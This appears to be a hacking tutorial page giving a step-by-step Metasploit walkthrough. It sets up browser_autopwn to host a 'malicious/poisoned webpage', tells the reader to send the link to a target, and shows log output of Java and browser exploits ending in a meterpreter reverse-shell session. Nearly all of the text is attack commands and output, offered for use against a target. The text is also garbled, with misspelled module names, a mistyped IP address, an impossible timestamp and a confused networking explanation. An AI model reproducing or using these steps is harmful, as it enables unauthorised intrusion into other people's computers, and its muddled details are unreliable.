BindTCP

Tcp

 

Every machine across the world that contains an Ethernet card, can run with couple addresses: 127.0.0.1 & 192.168.XX.XX at the same time.
Every address is associated with any port that he chooses for himself at the socket, and this process called: BINDING.
What we gonna do is: to create a Malicious\Poisoned Webpage over the BindTCP at the target machine, and by this, we gonna access into our target.

[LETS MAKE IT WORK]

#1) Open terminal & type:
assault@hackbook:~$ sudo msfconsole
*Inside msf console type*
msf > use exploit/windows/dceprc/ms03_026_dcom
msf exploit (ms_03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
*The output will be: PAYLOAD => windows/meterpreter/bind_tcp*

*Now, Set The Remote Host – target’s local ip address*
msf exploit (ms_03_026_dcom) > set RHOST 192.168.50.7
*The output will be: RHOST => 192.168.50.7*

*Now, Set The Remote Port*
msf exploit (ms_03_026_dcom) > set RPORT 445
RPORT => 445
msf exploit (ms_03_026_dcom) > use auxiliary/server/browser_autopwn

*Now Set The Local Host – hacker’s local ip address*
msf auxiliary (browser_autopwn) > set LHOST 192.168.50.15
*The output will be: LHOST => 192.168.50.15*
msf auxiliary (browser_autopwn) > show options
*Here we will get the whole details about our exploit process*

Now, let’s make it work. Let’s type:
msf exploit (browser_autopwn) > exploit

*You should get output like this – for example*

[*] Auxiliary module execution completed

[*] Setup
msf auxiliary(browser_autopwn) >

[*] Starting exploit modules on host 192.168.50.15…
[*]

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/ZbZWGnsSdkY
[*] Local IP: http://192.168.50.15:8080/ZbZWGnsSdkY
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/YNqINicHZU
[*] Local IP: http://192.168.50.15:8080/YNqINicHZU
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/BFETWicBTO
[*] Local IP: http://192.168.50.15:8080/BFETWicBTO
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/KNJYWLbvmTrv
[*] Local IP: http://192.168.50.15:8080/KNJYWLbvmTrv
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/zJgyfwaHfknsm
[*] Local IP: http://192.168.50.15:8080/zJgyfwaHfknsm
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/PSDNqAbbY
[*] Local IP: http://192.168.50.15:8080/PSDNqAbbY
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/WqlhgoA
[*] Local IP: http://192.168.50.15:8080/WqlhgoA
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/acsD
[*] Local IP: http://192.168.50.15:8080/acsD
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/VBDrsmM
[*] Local IP: http://192.168.50.15:8080/VBDrsmM
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/vtGCawPJrdo
[*] Local IP: http://192.168.50.15:8080/vtGCawPJrdo
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/wKHV
[*] Local IP: http://192.168.50.15:8080/wKHV
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/bFPtvbKM
[*] Local IP: http://192.168.50.15:8080/bFPtvbKM
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/LYRboZdA
[*] Local IP: http://192.168.50.15:8080/LYRboZdA
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/hhYQMY
[*] Local IP: http://192.168.50.15:8080/hhYQMY
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/hryyaDJULHHFS
[*] Local IP: http://192.168.50.15:8080/hryyaDJULHHFS
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/QsQcOD
[*] Local IP: http://192.168.50.15:8080/QsQcOD
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/eBnHCxf
[*] Local IP: http://192.168.50.15:8080/eBnHCxf
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/nYNGQOiV
[*] Local IP: http://192.168.50.15:8080/nYNGQOiV
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/ggHgaVluKyvgg
[*] Local IP: http://192.168.50.15:8080/ggHgaVluKyvgg
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/vlctiYnh
[*] Local IP: http://192.168.50.15:8080/vlctiYnh
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.50.15:3333
[*] Starting the payload handler…
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.50.15:6666
[*] Started reverse TCP handler on 192.168.50.15:7777
[*] Starting the payload handler…
[*] Starting the payload handler…

[*] — Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:8080/77SCMnomzkPP
[*] Local IP: http://192.168.50.15:8080/77SCMnomzkPP
[*] Server started.

 

*In that point, you need to send this link to your target: http://192.168.50.15:8080/77SCMnomzkPP. The MSF is now waiting to the target respond, Once the target will hit the link, we will get this output – for example*

[*] Handling ‘/77SCMnomzkPP’
[*] Handling ‘/77SCMnomzkPP?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDplbi1VUzp4ODY6TVNJRTo5LjA6’
[*] JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:en-US:x86:MSIE:9.0:
[*] Reporting: {“os.product”=>”Windows 7”, “os.language”=>”en-US”, “os.arch”=>”x86”, “os.certainty”=>”0.7”}
[*] Responding with 11 exploits
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] handling request for /mKUpayw
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] handling request for /mKUpayw/
[*] Sending jar
[*] Sending jar
[*] handling request for /mKUpayw
[*] handling request for /FtyKaG
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] handling request for /mKUpayw/
[*] handling request for /FtyKaG/
[*] Sending jar
[*] Sending jar
[*] handling request for /mKUpayw
[*] handling request for /FtyKaG
[*] handling request for /mKUpayw/
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] handling request for /mKUpayw/sBDZqkOz.jar
[*] handling request for /FtyKaG/
[*] handling request for /mKUpayw/sBDZqkOz.jar
[*] Sending jar
[*] Sending jar
[*] Sending Applet.jar
[*] Sending Applet.jar
[*] handling request for /mKUpayw
[*] handling request for /FtyKaG
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] handling request for /mKUpayw/
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] Generated jar to drop (5125 bytes).
[*] handling request for /FtyKaG/
[*] handling request for /mKUpayw/hqnUPATq.jar
[*] Sending jar
[*] handling request for /mKUpayw/hqnUPATq.jar
[*] Sending jar
[*] Sending jar
[*] Sending jar
[*] handling request for /mKUpayw
[*] handling request for /FtyKaG
[*] Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] Generated jar to drop (5125 bytes).
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] handling request for /mKUpayw/
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] handling request for /qWELgVkaZEEul
[*] handling request for /FtyKaG/
[*] handling request for /qWELgVkaZEEul/
[*] Sending jar
[*] Sending jar
[*] handling request for /mKUpayw/ZDkGSVKJ.jar
[*] handling request for /mKUpayw/ZDkGSVKJ.jar
[*] Sending jar
[*] Sending jar
[*] handling request for /qWELgVkaZEEul/gCTAlyO.jar
[*] handling request for /qWELgVkaZEEul/gCTAlyO.jar
[*] handling request for /FtyKaG
[*] handling request for /mKUpayw
[*] handling request for /qWELgVkaZEEul
[*] Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] Generated jar to drop (5125 bytes).
[*] handling request for /mKUpayw/
[*] handling request for /qWELgVkaZEEul/
[*] Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] Generated jar to drop (5125 bytes).
[*] handling request for /FtyKaG/
[*] Sending jar
[*] handling request for /mKUpayw/QsIroyrm.jar
[*] Sending jar
[*] handling request for /mKUpayw/QsIroyrm.jar
[*] handling request for /qWELgVkaZEEul/qlMnm.jar
[*] handling request for /qWELgVkaZEEul/qlMnm.jar
[*] Sending jar
[*] Sending jar
[*] Java Applet Rhino Script Engine Remote Code Execution handling request
[*] Meterepreter sesion 1 opened (192.16.50.15:7777 -> 192.168.50.7:1552) at 22-22-22-22 00:00:00 +0200
[*] Sending stage (45744 bytes) to 192.168.50.7
[*] Session ID 5 (192.168.50.15:3333 -> 192.168.50.7:1545) processing InitiakAut
[*] Current server process : GIUfsedggbfgrvFHRdjdss.exe )6108)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3116
[+] Successfully migrated to process
*Now, press Enter to terminate the process & you will get this output*
Interrupt: use the ‘exit’ command to quit
*Type*
msf auxiliaty(browser_autopwn) > sessions
*And you should get this output*

Active sessions
===============

Id         Type                                             Information                              Connection
—          —-                                                ————-                                 ————-
1          Meterpret java/java          yesigotyou @ kenny             192.168.50.15:7777 -> 192.168.50.7:1536 (192.168.50.7)

*Type*
msf auxiliary(browser_autopwn) > session -i 1
[*] Starting interaction with 1…

meterpreter >

 

ENJOY! 🙂

 

 

Here is an example by Gamer Forever